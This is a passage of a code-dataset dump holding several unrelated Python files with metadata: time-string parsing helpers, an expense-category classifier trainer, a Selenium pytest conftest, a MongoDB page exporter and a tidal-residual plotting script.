time_str = transform_time(time_str=time_str)\n return clean_time(time_str=time_str)\n\n\ndef transform_time(time_str):\n if u'小时' in time_str:\n add_hour = re.findall(u'(.*?)小时', time_str)\n if add_hour:\n add_hour = add_hour[0]\n else:\n add_hour = '0'\n year = time.strftime('%Y')\n month = time.strftime('%m')\n day = int(time.strftime('%d'))\n hour = int(time.strftime('%H')) - int(add_hour)\n if hour < 0:\n day = day - 1\n hour = 24 + hour\n if hour < 10:\n hour = '0{}'.format(hour)\n minute = time.strftime('%M')\n time_str = u'{}-{}-{} {}:{}'.format(year, month, day, hour, minute)\n elif u'分钟' in time_str:\n add_minute = re.findall(u'(.*?)分钟', time_str)\n if add_minute:\n add_minute = add_minute[0]\n else:\n add_minute = '0'\n year = time.strftime('%Y')\n month = time.strftime('%m')\n day = time.strftime('%d')\n hour = int(time.strftime('%H'))\n minute = int(time.strftime('%M')) - int(add_minute)\n 
if minute < 0:\n hour = hour - 1\n minute = 60 + minute\n if minute < 10:\n minute = '0{}'.format(minute)\n if hour < 10:\n hour = '0{}'.format(hour)\n time_str = u'{}-{}-{} {}:{}'.format(year, month, day, hour, minute)\n return time_str\n\n\ndef clean_time(time_str):\n date_temp = re.findall(DATE_PATTERN, time_str) or ['']\n time_temp = re.findall(TIME_PATTERN, time_str) or [('',)]\n\n date_str = date_temp[0]\n time_str = time_temp[0][0]\n\n date_str = date_str.replace(u'年', '-').replace(u'月', '-').replace(u'日', '').replace(r'/', '-').replace(r'.', '-')\n time_str = time_str.replace(u'时', ':').replace(u'分', ':').replace(u'秒', '')\n if date_str.endswith('-'):\n date_str = date_str[:-1]\n if time_str.endswith(':'):\n time_str = time_str[:-1]\n if not re.findall(SECOND_PATTERN, time_str):\n temp = re.findall(MINUTE_PATTERN, time_str)\n minute_str = temp[0] if temp else '00:00'\n time_str = '{}:{}'.format(minute_str, '00')\n\n return '{} {}'.format(date_str, time_str).strip() if date_str else ''\n\n\nif __name__ == '__main__':\n random_sleep_time(5, 2)\n\n", "sub_path": "common_tools/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 9194, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.setdefaultencoding", "line_number": 10, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 11, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 27, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 28, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 29, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 30, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 57, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 67, "usage_type": "call"}, {"api_name": "six.text_type", "line_number": 76, "usage_type": "attribute"}, {"api_name": "six.text_type", "line_number": 78, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "common_tools.config.PROXY_GET_URL", "line_number": 97, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 97, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 101, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 101, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 103, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 103, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 118, "usage_type": "call"}, {"api_name": "common_tools.config.PROXY_PUT_URL", "line_number": 118, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 118, "usage_type": "name"}, {"api_name": "common_tools.exception.PutProxyError", "line_number": 120, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 120, "usage_type": "name"}, {"api_name": "common_tools.exception.PutProxyError", "line_number": 122, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 122, "usage_type": "name"}, {"api_name": "re.sub", "line_number": 132, 
"usage_type": "call"}, {"api_name": "common_tools.config.ZHIMA_PROXY_URL", "line_number": 132, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 132, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 133, "usage_type": "call"}, {"api_name": "common_tools.config.DEFAULT_HEADERS", "line_number": 133, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 133, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 143, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 143, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 145, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 145, "usage_type": "name"}, {"api_name": "common_tools.config.WHITE_URL", "line_number": 151, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 151, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 152, "usage_type": "call"}, {"api_name": "common_tools.config.DEFAULT_HEADERS", "line_number": 152, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 152, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 154, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 154, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 163, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 163, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 163, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 164, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 164, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 164, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 165, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 165, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 165, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 166, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 166, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 166, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 181, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 181, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 181, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 182, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 182, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 182, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 183, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 183, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 183, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 184, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 184, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 
184, "usage_type": "name"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 200, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 200, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 202, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY.get", "line_number": 203, "usage_type": "call"}, {"api_name": "common_tools.config.ABUYUN_PROXY", "line_number": 203, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 203, "usage_type": "name"}, {"api_name": "common_tools.config.ABUYUN_SWITCH_IP", "line_number": 204, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 204, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_PROXY.get", "line_number": 205, "usage_type": "call"}, {"api_name": "common_tools.config.DOBEL_PROXY", "line_number": 205, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 205, "usage_type": "name"}, {"api_name": "common_tools.config.DOBEL_SWITCH_IP", "line_number": 206, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 206, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 210, "usage_type": "call"}, {"api_name": "common_tools.config.DEFAULT_HEADERS", "line_number": 210, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 210, "usage_type": "name"}, {"api_name": "requests.RequestException", "line_number": 211, "usage_type": "attribute"}, {"api_name": "common_tools.exception.GetProxyError", "line_number": 212, "usage_type": "call"}, {"api_name": "common_tools.exception", "line_number": 212, "usage_type": "name"}, {"api_name": "requests.Response", "line_number": 221, "usage_type": "attribute"}, {"api_name": "common_tools.config.CHARTSET_RE.findall", "line_number": 224, "usage_type": "call"}, {"api_name": "common_tools.config.CHARTSET_RE", "line_number": 224, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 224, "usage_type": "name"}, {"api_name": "common_tools.config.CHARTSET_RE.findall", "line_number": 225, "usage_type": "call"}, {"api_name": "common_tools.config.CHARTSET_RE", "line_number": 225, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 225, "usage_type": "name"}, {"api_name": "common_tools.config.PRAGMA_RE.findall", "line_number": 226, "usage_type": "call"}, {"api_name": "common_tools.config.PRAGMA_RE", "line_number": 226, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 226, "usage_type": "name"}, {"api_name": "common_tools.config.PRAGMA_RE.findall", "line_number": 227, "usage_type": "call"}, {"api_name": "common_tools.config.PRAGMA_RE", "line_number": 227, "usage_type": "attribute"}, {"api_name": "common_tools.config", "line_number": 227, "usage_type": "name"}, {"api_name": "chardet.detect", "line_number": 229, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 241, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 246, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 247, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 248, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 249, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 255, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 258, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 263, "usage_type": "call"}, {"api_name": "time.strftime", 
"line_number": 264, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 265, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 266, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 267, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 280, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 281, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 292, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 293, "usage_type": "call"}]}
+{"seq_id": "573054179", "text": "from sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.linear_model import SGDClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\nfrom scipy.sparse import csr_matrix\nimport psycopg2\nimport numpy\nimport random\nimport pickle\nimport sys\nimport db_manager\nimport prediction_utility\n\nCLASS_SIZE = 10\n\nENV = sys.argv[1]\nUSER_ID = sys.argv[2]\nprint('#node:Python Started', ENV, USER_ID)\n\n\n# region Database methods\ndef getExpenses():\n connection = db_manager.connect(ENV)\n with connection.cursor() as curs:\n curs.execute(\n 'SELECT amount, date, stores.store_name, COALESCE(category_id, -1) ' +\n 'FROM expenses LEFT JOIN stores on stores.id = store_id' +\n ' WHERE user_id = %s ORDER BY category_id;', [USER_ID])\n expenses = curs.fetchall()\n return expenses\n\n\ndef save_model(model, exp_count):\n connection = db_manager.connect(ENV)\n with connection.cursor() as curs:\n curs.execute(\n 'INSERT INTO category_classifier (user_id, model, expense_count, \"createdAt\", \"updatedAt\") ' +\n 'VALUES (%s, %s, %s, now(), now()) ON CONFLICT (user_id) DO UPDATE SET model = EXCLUDED.model, \"updatedAt\" = now(), expense_count = EXCLUDED.expense_count;',\n (str(USER_ID), psycopg2.Binary(model), str(exp_count)))\n connection.commit()\n# endregion\n\n\ndef formatExpenses(expenses, store_vectorizer):\n result = []\n categories = []\n for expense in expenses:\n result.append(prediction_utility.format_expense(\n expense, store_vectorizer))\n categories.append(-1 if expense[3] == None else expense[3])\n return (result, categories)\n\n\n# region :Text vectorization\ndef getLetterCombinations():\n # generate all possible permutations of letters\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',\n 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n return [letter+letter2 for letter2 in letters for letter in letters]\n\n\ndef build_vectorizer(texts):\n vectorizer = CountVectorizer(analyzer='char', ngram_range=(2, 2))\n # returns document-term matrix\n X = vectorizer.fit_transform(texts)\n print(len(X.toarray()))\n return vectorizer\n# endregion\n\n\ndef sample(expenses):\n groups = {}\n # group expenses by category\n for exp in expenses:\n try:\n groups[exp[3]].append(exp)\n except:\n groups[exp[3]] = [exp]\n # over and undersample as required\n final = []\n for g in groups:\n if(len(groups[g]) < CLASS_SIZE):\n while(len(groups[g]) < CLASS_SIZE):\n groups[g] = groups[g] + groups[g].copy()\n # if(len(groups[g]) > CLASS_SIZE):\n # groups[g] = groups[g][0:10]\n final = final + groups[g]\n return final\n\n\n# region: Helpers\ndef printAll(arr):\n for a in arr:\n print(a)\n\n\ndef r():\n return 0.5\n\n\ndef add(prop, obj):\n try:\n obj[prop] += 1\n except:\n obj[prop] = 1\n\n\ndef printResults(result):\n tCount = {}\n catCount = {}\n\n i = 0\n correct = 0\n for r in result:\n print(r, categories[i])\n if(r == categories[i]):\n correct += 1\n add(r, tCount)\n add(categories[i], catCount)\n i += 1\n\n print('Overall: ', correct / len(categories))\n\n # print('Test Counts')\n # printCount(tCount)\n print('Actual Counts')\n printCount(catCount, tCount)\n\n\ndef printCount(count, tCount):\n # Print distribution of prediciton vs actual distribution\n for c in count:\n print(c, ': ', count[c], tCount[c] if c in tCount else 0)\n# endregion\n\n\ndef getSGDCLassifier(l):\n 
return SGDClassifier(n_iter_no_change=int(1000000/l))  # patience scales inversely with dataset size; the argument must be an int\n\n\ndef main():\n    print('Started')\n    store_vectorizer = build_vectorizer(getLetterCombinations())\n    # print(store_vectorizer.transform(['abaa']).toarray())\n    expenses = getExpenses()\n    # the two-argument form of random.shuffle was removed in Python 3.11; the constant-valued r() makes this shuffle deterministic\n    random.shuffle(expenses, r)\n    (formatted, categories) = formatExpenses(expenses, store_vectorizer)\n    clf = make_pipeline(\n        # StandardScaler(),\n        # getSGDCLassifier(len(expenses))\n        RandomForestClassifier()\n    )\n    clf.fit(formatted, categories)\n\n    print('clf Score: ', clf.score(formatted, categories))\n\n    save_model(pickle.dumps(clf), len(expenses))\n\n\nmain()\n", "sub_path": "server/prediction/create_prediction_model.py", "file_name": "create_prediction_model.py", "file_ext": "py", "file_size_in_byte": 4371, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "sys.argv", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "db_manager.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "db_manager.connect", "line_number": 35, "usage_type": "call"}, {"api_name": "psycopg2.Binary", "line_number": 40, "usage_type": "call"}, {"api_name": "prediction_utility.format_expense", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.linear_model.SGDClassifier", "line_number": 139, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.pipeline.make_pipeline", "line_number": 149, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 152, "usage_type": "call"}, {"api_name": "pickle.dumps", "line_number": 158, "usage_type": "call"}]}
+{"seq_id": "196598859", "text": "import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nimport time\n\n# обработка командной строки - '--browser_name' - название параметра который можно вводить в командную строку\n# default=None - можно поставить значение по умолчанию\ndef pytest_addoption(parser):\n parser.addoption('--browser', action='store', default=None,\n help=\"Choose browser: chrome or firefox\")\n\n parser.addoption('--language', action='store', default='en-gb',\n help=\"Choose browser: chrome or firefox\")\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n # проверка что текущий браузер chrome or firefox\n browser = request.config.getoption(\"browser\")\n browser = None\n if browser == \"chrome\" or \"Chrome\":\n print(\"\\nstart chrome browser for test..\")\n browser = webdriver.Chrome()\n elif browser == \"firefox\" or \"Firefox\":\n print(\"\\nstart firefox browser for test..\")\n browser = webdriver.Firefox()\n else:\n raise pytest.UsageError(\"--browser should be chrome or firefox\")\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n user_language = request.config.getoption(\"--language\")\n print(f\"\\nstart browser for test in {user_language}\")\n options = Options()\n options.add_experimental_option('prefs', {'intl.accept_languages': user_language})\n browser = webdriver.Chrome(options=options)\n link = f\"http://selenium1py.pythonanywhere.com/{user_language}/accounts/login/\"\n browser.get(link)\n browser.maximize_window()\n time.sleep(1)\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n", "sub_path": "conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 1845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 25, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 25, "usage_type": "name"}, {"api_name": "pytest.UsageError", "line_number": 27, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 36, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 38, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 38, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 42, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 32, "usage_type": "call"}]}
+{"seq_id": "258931371", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pymongo\nfrom os import path, makedirs\nfrom bson import json_util\nimport sys\nfrom glob import glob\nimport json\nimport re\n\nBASE_DIR = path.dirname(path.dirname(__file__))\nsys.path.append(BASE_DIR)\n\nfrom controller.base import prop\nfrom controller.page.base import PageHandler as Ph\n\n\ndef export_page(db_name='tripitaka', uri='localhost', out_dir=None, source='', phonetic=False, text_finished=False):\n conn = pymongo.MongoClient(uri)\n db = conn[db_name]\n cond = {'source': {'$regex': str(source)}} if source else {}\n if phonetic:\n cond['$or'] = [{f: {'$regex': '音釋|音释'}} for f in ['ocr', 'ocr_col', 'text']]\n out_dir = out_dir and str(out_dir) or source or 'pages'\n for index in range(1000):\n rows = list(db.page.find(cond).skip(index * 100).limit(100))\n if rows:\n if not path.exists(out_dir):\n makedirs(out_dir)\n print('export %d pages...' % len(rows))\n for p in rows:\n tasks = db.task.find({'doc_id': p['name'], 'task_type': {'$regex': '^text'}, 'status': 'finished'})\n if text_finished and not tasks:\n continue\n for task in tasks:\n p[task['task_type']] = Ph.html2txt(prop(task, 'result.txt_html', ''))\n\n p['_id'] = str(p['_id'])\n p['create_time'] = p['create_time'].strftime('%Y-%m-%d %H:%M:%S')\n with open(path.join(out_dir, '%s.json' % str(p['name'])), 'w') as f:\n for k, v in list(p.items()):\n if not v or k in ['lock', 'level', 'tasks']:\n p.pop(k)\n f.write(json_util.dumps(p, ensure_ascii=False))\n\n\n# python3 ~/export_page.py --out_dir=1200 --source=1200 --phonetic=1 --text_finished=1 --db_name=... --uri=mongodb://...\ndef export_phonetic(json_dir):\n with open('phonetic.txt', 'w') as f:\n for json_file in sorted(glob(path.join(json_dir, '*.json'))):\n page = json.load(open(json_file))\n texts, tags = set(), []\n for i, field in enumerate(['text_proof_1', 'text_proof_2', 'text', 'ocr', 'ocr_col']):\n text = re.search(r'(音释|音釋)\\|+(.+)$', page.get(field, ''))\n if text:\n if texts and i > 1:\n continue\n text = text.group(2)\n txt2 = re.sub('[YM]', '', text)\n if txt2 not in texts:\n texts.add(txt2)\n tags.append((field, text))\n names = dict(text_proof_1='一校', text_proof_2='二校', text='旧审', ocr='字框', ocr_col='行文')\n for field, text in tags:\n f.write('%s(%s)\\t%s\\n' % (page['name'], names[field], text))\n\n\nif __name__ == '__main__':\n import fire\n\n fire.Fire(export_page)\n print('finished!')\n", "sub_path": "utils/export_page.py", "file_name": "export_page.py", "file_ext": "py", "file_size_in_byte": 2947, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "sys.path.append", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "pymongo.MongoClient", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 30, "usage_type": "call"}, {"api_name": "controller.page.base.PageHandler.html2txt", "line_number": 37, "usage_type": "call"}, {"api_name": "controller.page.base.PageHandler", "line_number": 37, "usage_type": "name"}, {"api_name": "controller.base.prop", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", 
"line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "name"}, {"api_name": "bson.json_util.dumps", "line_number": 45, "usage_type": "call"}, {"api_name": "bson.json_util", "line_number": 45, "usage_type": "name"}, {"api_name": "glob.glob", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "name"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "re.search", "line_number": 55, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 60, "usage_type": "call"}, {"api_name": "fire.Fire", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "306377851", "text": "from __future__ import division,print_function\nimport matplotlib as mpl\nimport scipy as sp\nfrom datatools import *\nfrom gridtools import *\nfrom plottools import *\nfrom projtools import *\nimport matplotlib.tri as mplt\nimport matplotlib.pyplot as plt\n#from mpl_toolkits.basemap import Basemap\nimport os as os\nimport sys\nnp.set_printoptions(precision=8,suppress=True,threshold=sys.maxsize)\nsys.path.append('/home/moe46/Desktop/school/workspace_python/ttide_py/ttide/')\nsys.path.append('/home/moflaher/Desktop/workspace_python/ttide_py/ttide/')\nfrom t_tide import t_tide\nfrom t_predic import t_predic\nfrom matplotlib.collections import LineCollection as LC\nfrom matplotlib.collections import PolyCollection as PC\nimport multiprocessing\n\n# Define names and types of data\nname='2012-02-01_2012-03-01_0.01_0.001'\ngrid='vh_high'\n\nregionname='secondnarrows'\nstarttime=0\nendtime=1000\ncmin=0\ncmax=0.5\n\n\n### load the .nc file #####\ndata = loadnc('runs/'+grid+'/'+name+'/output/',singlename=grid + '_0001.nc')\nprint('done load')\ndata = ncdatasort(data)\nprint('done sort')\n\nvectorflag=False\ncoastflag=True\nuniformvectorflag=True\n#vector_spacing=125\n#vector_scale=750\nvector_spacing=75\nvector_scale=1250\nzetanode=2500\n\ncages=loadcage('runs/'+grid+'/' +name+ '/input/' +grid+ '_cage.dat')\nif np.shape(cages)!=():\n tmparray=[list(zip(data['nodell'][data['nv'][i,[0,1,2,0]],0],data['nodell'][data['nv'][i,[0,1,2,0]],1])) for i in cages ]\n color='g'\n lw=.2\n ls='solid'\n\n\nregion=regions(regionname)\nnidx=get_nodes(data,region)\neidx=get_elements(data,region)\nvidx=equal_vectors(data,region,vector_spacing)\n\nsavepath='figures/timeseries/' + grid + '_' + '/residual_with_zeta/' + name + '_' + regionname + '_' +(\"%f\" %cmin) + '_' + (\"%f\" %cmax) + '/'\nif not os.path.exists(savepath): os.makedirs(savepath)\n\n\nuv=np.load('data/ttide/'+grid+'_'+name+'_'+'_uv_all.npy')\nuv=uv[()]\n\nresu=np.zeros((data['nele'],len(data['time'][starttime:(endtime+1)])))\nresv=np.zeros((data['nele'],len(data['time'][starttime:(endtime+1)])))\nfor j in range(0,len(eidx)):\n print( (\"%d\"%j)+\" \"+(\"%f\"%(j/len(eidx)*100)))\n i=eidx[j] \n tp=t_predic(data['time'][starttime:(endtime+1)],uv['nameu'],uv['freq'],uv['tidecon'][i,:,:])\n resu[i,:]=data['ua'][starttime:(endtime+1),i]-np.real(tp).flatten()\n resv[i,:]=data['va'][starttime:(endtime+1),i]-np.imag(tp).flatten()\n\n\nymax=np.max(data['zeta'][starttime:endtime,nidx[zetanode]])\nymin=np.min(data['zeta'][starttime:endtime,nidx[zetanode]])\n\n\ndef res_plot(i):\n print(i)\n f=plt.figure()\n ax=plt.axes([.125,.1,.775,.8])\n triax=ax.tripcolor(data['trigrid'],np.sqrt(resu[:,i]**2+resv[:,i]**2),vmin=cmin,vmax=cmax)\n if coastflag==True:\n plotcoast(ax,filename='pacific_harbour.nc',color='None', fcolor='darkgreen', fill=True)\n if np.shape(cages)!=(): \n lseg_t=LC(tmparray,linewidths = lw,linestyles=ls,color=color)\n ax.add_collection(lseg_t) \n if vectorflag==True:\n Q1=ax.quiver(data['uvnodell'][vidx,0],data['uvnodell'][vidx,1],resu[vidx,i],resv[vidx,i],angles='xy',scale_units='xy',scale=vector_scale,zorder=100,width=.0025) \n if uniformvectorflag==True:\n norm=np.sqrt(resu[vidx,i]**2+resv[vidx,i]**2)\n Q1=ax.quiver(data['uvnodell'][vidx,0],data['uvnodell'][vidx,1],np.divide(resu[vidx,i],norm),np.divide(resv[vidx,i],norm),angles='xy',scale_units='xy',scale=vector_scale,zorder=100,width=.002,color='k') \n prettyplot_ll(ax,setregion=region,cblabel=r'Residual (ms$^{-1}$)',cb=triax)\n \n 
#ax1=plt.axes([.125,.675,.675,.2])\n ax1=plt.axes([.125,.545,.675,.2])\n ax1.plot(data['time'][starttime:i]-data['time'][starttime],data['zeta'][starttime:i,nidx[zetanode]])\n ax1.set_ylabel(r'Elevation (m)')\n ax1.set_xlabel(r'Time (days)')\n ax1.xaxis.set_tick_params(labeltop='on',labelbottom='off')\n ax1.axis([data['time'][starttime]-data['time'][starttime],data['time'][endtime]-data['time'][starttime],ymin,ymax])\n _formatter = mpl.ticker.ScalarFormatter(useOffset=False)\n ax1.yaxis.set_major_formatter(_formatter)\n ax1.xaxis.set_major_formatter(_formatter)\n ax1.xaxis.set_label_coords(0.5, 1.4) \n \n \n \n f.savefig(savepath + grid + '_' + region['regionname'] +'_residual_' + (\"%04d\" %(i)) + '.png',dpi=150)\n plt.close(f)\n\n\n\npool = multiprocessing.Pool(2)\npool.map(res_plot,range(starttime,endtime))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n", "sub_path": "plot_residual_with_zeta.py", "file_name": "plot_residual_with_zeta.py", "file_ext": "py", "file_size_in_byte": 4374, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "sys.maxsize", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path", "line_number": 62, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 62, "usage_type": "call"}, {"api_name": "t_predic.t_predic", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.collections.LineCollection", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axes", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.ticker.ScalarFormatter", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.ticker", "line_number": 106, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.close", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "multiprocessing.Pool", "line_number": 118, "usage_type": "call"}]}
